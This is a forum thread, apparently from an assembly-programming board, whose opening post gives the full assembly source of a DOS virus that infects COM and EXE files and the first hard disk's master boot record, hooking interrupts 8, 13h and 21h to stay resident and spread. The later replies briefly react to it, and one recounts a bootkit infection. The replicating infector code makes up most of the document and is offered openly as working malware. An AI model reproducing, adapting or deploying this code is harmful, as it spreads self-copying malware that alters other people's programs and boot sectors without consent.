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Index > OS Construction > i tested this works Nice! It is the MBR_TSR we all face.

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Joined: 03 Apr 2011
Posts: 12092
mbr_tsr 03 May 2011, 21:21
; This virus is an com, exe and partitiontable infector. It will become resident
; after the first reboot. The virus is stored above TOM but below 640k.
; When the virus is resident the virus will infect every com and exe-file that
; is created or opend for read and write. The virus doesn't use any stealth
; techniques. The virus doesn't do anything besides replicate. I don't have
; a good name for it, so I named it 'Digital Research Virus'.

SectorCount   equ     (CodeEnd-$+1ffh) shr 9  ; Codesize in sectors
MemoryCount    equ     (DataEnd-$+3ffh) shr 10 ; Memory needed in kb

; The first part of a com-file is overwritten by the following code

ComCS             equ     this word+4

    mov     dx,cs
       add     dx,100h
     push    dx
  mov     dx,offset MainCOM
   push    dx
        dw      0DEADh

EntrySize equ     ($-ComEntry)
SavedCode       equ     this word               ; orginal com-entry code

OldCSIP         equ     this dword              ; orginal ip,cs,ss and sp
OldIP              dw      0
OldCS              dw      -10h
OldSS           dw      0
OldSP              dw      400h
                db      EntrySize-8 dup(0)

; The first part of the bootsector is overwritten by the folowing code

       cli                                     ; disable interrupts
        xor     bx,bx                           ; set ds and ss:sp
      mov     ds,bx
       mov     ss,bx
       mov     sp,7c00h
    sti                                     ; enable interrupts
 mov     ax,ds:[413h]                        ; get memorysize
    sub     ax,MemoryCount                  ; adjust memory size
        mov     ds:[413h],ax                        ; store new memorysize
      mov     cl,6                            ; calculate segment address
 shl     ax,cl
       mov     es,ax
       push    ax                              ; store segment and offset
  mov     ax,offset StartUp               ; of startup on stack
       push    ax
  mov     ax,200h+SectorCount             ; read the virus from disk
  mov     cx,2
        mov     dx,80h
      int     13h
 retf                                    ; jump to startup procedure

BootSize     equ     ($-BootSector)

; startup procedure

 cli                                     ; disable interrupts
        mov     ax,offset Interrupt8            ; save old interrupt 8 vector
       xchg    ax,ds:[20h]                 ; and store new vector
      mov     word ptr es:SavedInt8[0],ax
     mov     ax,cs
       xchg    ax,ds:[22h]
     mov     word ptr es:SavedInt8[2],ax
     mov     cs:Count,182
    sti                                     ; enable interrupts
 push    ds                              ; es=ds
     pop     es
  mov     bx,7c00h
    push    es                              ; store segment and offset of
       push    bx                              ; bootsector on stack
       mov     ax,201h                         ; read bootsector from disk
 mov     cx,1
        mov     dx,80h
      int     13h
 push    cs                              ; ds=cs
     pop     ds
  mov     si,offset OrginalBoot           ; restore first part of
     mov     di,7c00h                        ; bootsector
        mov     cx,BootSize
 rep     movsb
       push    es                              ; ds=es
     pop     ds
  retf                                    ; jump to bootsector

; This interrupt will do nothing until it's called for the 182nd time, at that
; moment 10 seconds have past, and the virus will adjust interrupt vector 13h
; and 21h

Count    dw      182

  cmp     cs:Count,0                  ; do nothing if interrupts
  jz      Old8                            ; are adjusted
      dec     cs:Count                    ; countdown (10 seconds)
    jnz     Old8
        push    ax                              ; save registers
    push    ds
  xor     ax,ax                           ; ds=0 (Interrupt vectors)
  mov     ds,ax
       mov     ax,offset Interrupt21           ; save old interrupt vector 21
      xchg    ax,ds:[84h]                 ; and store new vector
      mov     word ptr cs:SavedInt21[0],ax
    mov     ax,cs
       xchg    ax,ds:[86h]
     mov     word ptr cs:SavedInt21[2],ax
    mov     cs:Handle,0
     pop     ds                              ; restore registers
 pop     ax
Old8: jmp     cs:SavedInt8

; This interrupt is installed after 10 seconds, it will then infect every exe
; file that is created or opened to write. It also contains an installation
; check

       cmp     ah,30h
      je      Version                         ; dos version
       cmp     ah,3ch
      je      Open                            ; create file
       cmp     ax,3d02h
    je      Open                            ; open for write
    cmp     ah,3eh
      je      Close                           ; close file
Old21:      jmp     cs:SavedInt21                       ; do orginal interrupt

Open: cmp     cs:Handle,0                 ; other exe-file opnened ?
  jne     Old21                           ; yes, can't do anything
   call    CheckExe                        ; check for .exe extension
  jnc     ExeFile
     call    CheckCom
    jnc     ComFile
     jmp     Old21

ComFile:pushf                                  ; execute orginal interrupt
 call    cs:SavedInt21
   jc      Fail                            ; error opening file
        mov     cs:Handle,ax                        ; store handle for infection
        mov     cs:Infect,offset InfectCOM  ; store infect procedure
    retf    2

ExeFile:pushf                                      ; execute orginal interrupt
 call    cs:SavedInt21
   jc      Fail                            ; error opening file
        mov     cs:Handle,ax                        ; store handle for infection
        mov     cs:Infect,offset InfectEXE  ; store infect procedure
Fail:   retf    2

Close:     or      bx,bx                           ; handle 0 ?
        je      Old21                           ; do orginal interrupt
      cmp     bx,cs:Handle                        ; handle of exe-file ?
      jne     Old21                           ; no, do orginal interrupt
  call    cs:Infect                   ; infect file
       mov     cs:Handle,0
     jmp     Old21                           ; do orginal interrupt

Version:cmp   dx,0DEADh                       ; installation check
        jne     Old21                           ; no, do orginal interrupt
  mov     ax,dx                           ; ax=dx
     iret                                    ; return to caller

Extension     db      'EXE','COM'

        push    bx
  push    es
  push    cs
  pop     es
  mov     bx,offset Extension[0]
      call    Check
       pop     es
  pop     bx

    push    bx
  push    es
  push    cs
  pop     es
  mov     bx,offset Extension[3]
      call    Check
       pop     es
  pop     bx

Check:   push    ax                              ; check if extension is .exe
        push    cx                              ; save registers
    push    si
  push    di
  mov     al,0                            ; al=0
      mov     cx,100h                         ; max length is 100h characters
     mov     di,dx                           ; di=begin of filename
Nxt:      jcxz    Other                           ; length > 100h characters,
                                          ; must be an other file
     inc     di
  dec     cx
  cmp     byte ptr ds:[di-1],0                ; end of filename ?
 je      Last
        cmp     byte ptr ds:[di-1],'.'            ; point ?
   jne     Nxt                             ; no, next character
        mov     si,di                           ; si=di, si=last point
      mov     al,1                            ; al=1,  al=1 if point found
        jmp     Nxt                             ; next character
Last:   or      al,al                           ; point found ?
     je      Other                           ; no, it's not an exe-file
 mov     di,bx
 lodsw                                   ; get 2 bytes after '.'
   and     ax,0dfdfh                       ; uppercase
 scasw                                   ; compare
   jne     Other
       lodsb                                   ; get 1 byte
        and     al,0dfh                         ; uppercase
 scasb                                   ; compare
   jne     Other                           ; no, not an exe-file
       clc                                     ; clear carry, exe-file
     jmp     Done                            ; return to caller
Other:        stc                                     ; set carry, not an exe-file
Done:       pop     di                              ; restore registers
 pop     si
  pop     cx
  pop     ax
  ret                                     ; return to caller

; this procedure infects an exe-file that is opened and the handle is in bx

   push    ax                              ; save registers
    push    bx
  push    cx
  push    dx
  push    ds
  push    es
  push    cs                              ; ds=es=cs
  pop     ds
  push    cs
  pop     es
  mov     ax,4200h                        ; goto top of file
  xor     cx,cx
       xor     dx,dx
       call    DOS
 mov     ah,3fh                          ; read exe-header
   mov     cx,1ch
      mov     dx,offset ExeHeader
 call    ReadWrite
   cmp     ChkSum,0DEADh
       call    ReturnEqual
 mov     ChkSum,0DEADh
       mov     ax,ExeIP                        ; save orginal ip,cs,ss and sp
      mov     OldIP,ax
    mov     ax,ExeCS
    mov     OldCS,ax
    mov     ax,ExeSS
    mov     OldSS,ax
    mov     ax,ExeSP
    mov     OldSP,ax
    mov     ax,PageCount                    ; calculate new cs and ss
   mov     dx,PartPage
 or      dx,dx
       jz      Zero1
       dec     ax
Zero1:        add     dx,0fh
      mov     cl,4
        shr     dx,cl
       inc     cl
  shl     ax,cl
       add     ax,dx
       mov     dx,ax
       sub     dx,HeaderSize   
    mov     ExeCS,dx                        ; store new cs,ip,ss and sp
 mov     ExeIP,offset MainEXE
        mov     ExeSS,dx
    mov     ExeSP,offset CodeSize+800h
  mov     dx,10h                          ; calculate offset in file
  mul     dx
  push    ax                              ; save offset
       push    dx
  add     ax,offset CodeSize              ; calculate new image size
  adc     dx,0
        mov     cx,200h
     div     cx
  or      dx,dx
       je      Zero2
       inc     ax
Zero2:        mov     PageCount,ax
        mov     PartPage,dx
 cmp     MinMem,80h
  jae     MinOk
       mov     MinMem,80h
MinOk:        cmp     MaxMem,80h
  jae     MaxOk
       mov     MaxMem,80h
MaxOk:        pop     cx                              ; restore offset
    pop     dx
  mov     ax,4200h                        ; goto found offset
 call    DOS
 mov     ah,40h                          ; write virus
       mov     cx,offset CodeSize
  xor     dx,dx
       call    ReadWrite
   mov     ax,4200h                        ; goto top of file
  xor     cx,cx
       xor     dx,dx
       call    DOS
 mov     ah,40h                          ; write new exe-header
      mov     cx,1ch
      mov     dx,offset ExeHeader
 call    DOS
 jmp     Return
Error:    add     sp,2                            ; get return address of stack
Return:    pop     es                              ; restore registers
 pop     ds
  pop     dx
  pop     cx
  pop     bx
  pop     ax
  ret                                     ; return to caller

; jumps to error when z-flag is 1

   je      Error

; this procedure executes the orginal interrupt 21h, if ax is not equal to cx
; an error occured. This procedure is called from InfectEXE and InfectCOM

 call    cs:SavedInt21
   jc      Error
       cmp     ax,cx
       jne     Error

; this procedure executes the orginal interrupt 21h, and is called from
; InfectEXE and InfectCOM

DOS:   pushf                                   ; call orginal interrupt 21h
 call    cs:SavedInt21
   jc      Error                           ; error? yes, jump to error
 ret                                     ; return to caller

; this procedure infects an exe-file that is opened and the handle is in bx

   push    ax                              ; save registers
    push    bx
  push    cx
  push    dx
  push    ds
  push    es
  push    cs                              ; ds=es=cs
  pop     ds
  push    cs
  pop     es
  mov     ax,4200h                        ; goto top of file
  xor     cx,cx
       xor     dx,dx
       call    DOS
 mov     ah,3fh                          ; read first 3 bytes
        mov     cx,EntrySize
        mov     dx,offset SavedCode
 call    ReadWrite
   mov     si,offset SavedCode
 mov     di,offset ComEntry
  mov     cx,EntrySize
        rep     cmpsb
       je      Return
      mov     ax,4202h                        ; goto end of file
  xor     cx,cx
       xor     dx,dx
       call    DOS
 or      dx,dx
       ja      Error
       cmp     ax,0f000h
   ja      Error
       add     ax,0fh
      mov     cl,4                            ; prepare the com-entry
     shr     ax,cl
       add     ax,10h
      mov     ComCS,ax
    sub     ax,10h
      shl     ax,cl                           ; goto end of file
  mov     dx,ax
       mov     ax,4200h
    xor     cx,cx
       call    DOS
 mov     ah,40h                          ; write virus at the and of the
     mov     cx,offset CodeSize              ; com-file
  xor     dx,dx
       call    ReadWrite
   mov     ax,4200h
    xor     cx,cx
       xor     dx,dx
       call    DOS
 mov     ah,40h
      mov     cx,EntrySize
        mov     dx,offset ComEntry
  call    DOS
 jmp     Return

; This procedure infects the master bootsector of the first harddisk. There are
; no registers saved.

 mov     ah,30h                          ; installation check
        mov     dx,0DEADh
   int     21h
 cmp     ax,dx
       je      Infected
    push    cs                              ; ds=es=cs
  pop     ds
  push    cs
  pop     es
  mov     ax,201h                         ; read bootsector
   mov     bx,offset OrginalBoot
       mov     cx,1
        mov     dx,80h
      int     13h
 jc      Infected
    mov     si,offset OrginalBoot           ; compare bootsector with viral
     mov     di,offset BootSector            ; bootsector
        mov     cx,BootSize
 repe    cmpsb
       je      Infected
    mov     ax,300h+SectorCount             ; write virus to disk
       xor     bx,bx
       mov     cx,2
        mov     dx,80h
      int     13h
 jc      Infected
    mov     si,offset BootSector            ; adjust bootsector
 mov     di,offset OrginalBoot
       mov     cx,BootSize
 rep     movsb
       mov     ax,301h                         ; write bootsector to disk
  mov     bx,offset OrginalBoot
       mov     cx,1
        mov     dx,80h
      int     13h
        ret                                     ; return to caller

; this is the main procedure, when starting up from an com-file, it will
; check if the first harddisk is infected, if not it will infect it.

MainCOM:push    ds
  mov     dx,100h
     push    dx
  push    ax
  push    ds
  push    es
  push    cs
  pop     ds
  mov     si,offset SavedCode
 mov     di,dx
       mov     cx,EntrySize
        rep     movsb
       call    InfectBoot
  pop     es
  pop     ds
  pop     ax

; this is the main procedure, when starting up from an exe-file, it will
; check if the first harddisk is infected, if not it will infect it.

MainEXE:push  ax                              ; save registers
    push    ds
  push    es
  mov     ax,ds                           ; adjust cs and ss
  add     ax,10h
      add     cs:OldCS,ax
     add     cs:OldSS,ax
     call    InfectBoot                      ; infect the bootsector
     pop     es                              ; restore registers
 pop     ds
  pop     ax
  mov     ss,cs:OldSS                 ; set ss:sp
     mov     sp,cs:OldSP
     jmp     cs:OldCSIP                  ; jump to orginal code

CodeSize  equ     $

; the first part of the orginal bootsector is stored here

OrginalBoot     db      BootSize dup(0)
CodeEnd              equ     $

; the variables used by the virus when its resident are stored here

SavedInt8     dd      0                       ; orginal interrupt 8
SavedInt21     dd      0                       ; orginal interrupt 21
Handle                dw      0                       ; handle of first exe-file
                                          ; opened
Infect              dw      0                       ; offset infect procedure

Buffer         equ     this byte
ExeHeader  dw      0dh dup(0)              ; exe-header is stored here

Signature    equ     ExeHeader[0]            ; exe-signature 'MZ'
PartPage      equ     ExeHeader[2]            ; size of partitial page
PageCount   equ     ExeHeader[4]            ; number of pages (200h bytes)
HeaderSize    equ     ExeHeader[8]            ; size of the exe-header
MinMem              equ     ExeHeader[0ah]          ; minimum memory needed
MaxMem               equ     ExeHeader[0ch]          ; maximum memory needed
ExeSS                equ     ExeHeader[0eh]          ; SS
ExeSP           equ     ExeHeader[10h]          ; SP
ChkSum          equ     ExeHeader[12h]          ; checksum, DEAD if infected
ExeIP           equ     ExeHeader[14h]          ; IP
ExeCS           equ     ExeHeader[16h]          ; CS

DataEnd             equ     $

cseg ends

sseg segment stack 'stack'
      db      400h dup(?)
sseg ends

end MainEXE
Post 03 May 2011, 21:21
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Verbosity in development

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vid 03 May 2011, 22:27
Not really all of us, only those who use INT 21h Razz
Post 03 May 2011, 22:27
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xleelz 04 May 2011, 00:18
The very first virus I've ever seen code for... Looks pretty cool
Post 04 May 2011, 00:18
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rugxulo 26 May 2011, 18:23
Good news:

1). it does nothing harmful except waste a bit of space
2). open source so you can "fix" it easily
3). written for DOS (my fav!)

Bad news:

1). viruses are pretty useless, even as teaching material, and give you a bad reputation
2). 8.3 file names only (what, too lazy to implement 71xxh handling? perhaps it predates it!!)
3). (most importantly) THIS ISN'T WRITTEN FOR FASM AT ALL Razz Razz Razz
Post 26 May 2011, 18:23
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Enko 26 May 2011, 20:46
Once upon a time, a year ago, I had been infected with an bootkit. A rootkit stored in the MBR of an xp partition.
It was opening a new iexplorer window every 1 hour, an puted down the wave volume... not so hamfull but very annoying.

Spend a lot of hours trying to find the virus till realized that it was not on disk. So i found some tool that fix the mbr and pc is clean.
Post 26 May 2011, 20:46
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